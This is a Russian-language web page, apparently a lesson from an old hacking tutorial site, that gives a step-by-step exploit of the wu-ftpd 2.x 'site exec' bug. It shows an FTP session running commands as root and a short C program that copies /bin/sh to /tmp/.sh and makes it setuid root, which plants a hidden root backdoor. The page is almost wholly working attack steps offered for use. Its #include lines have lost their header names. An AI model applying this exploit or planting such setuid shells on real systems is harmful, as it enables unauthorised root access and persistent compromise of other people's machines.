2211
| ЗНАКОМСТВА | UKA.ru | Gossip.ru |Библиотека бесплатно! | massovka | vaticancitystate.ru | взрывЧАТка From 24.11.97
Lesson 021
----------

Цель: exploйt wu-ftp 2.x (site exec bug).

Требуется account в системе под запусокм wu-ftpd
Откомплирируйте программу в вашем каталоге:
	cc -o ftpbug ftpbug.c

Вход в систему:

220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready. 
Name (exploitablesys:root): goodaccount
331 Password required for goodaccount.
Password: (password)
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id"      (проверяем является ли sys доступной)
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200  (end of 'bash -c id')
ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
200-bash -c /yer/home/dir/ftpbug
200  (end of 'bash -c /yer/home/dir/ftpbug')
ftp> quit
221 Goodbye.

Теперь вы получаете suid root shell в /tmp/.sh

#include 
#include 
#include 

main()
{
   seteuid(0);
   system("cp /bin/sh /tmp/.sh");
   system("chmod 6777 /tmp/.sh");
}

PS. Thanx to StaTiC

123123
| ЗНАКОМСТВА | UKA.ru | Gossip.ru | lib.uka.ru | Flash memory: SD, MMC, miniSD, CF | взрывЧАТка From 24.11.97
uka.ru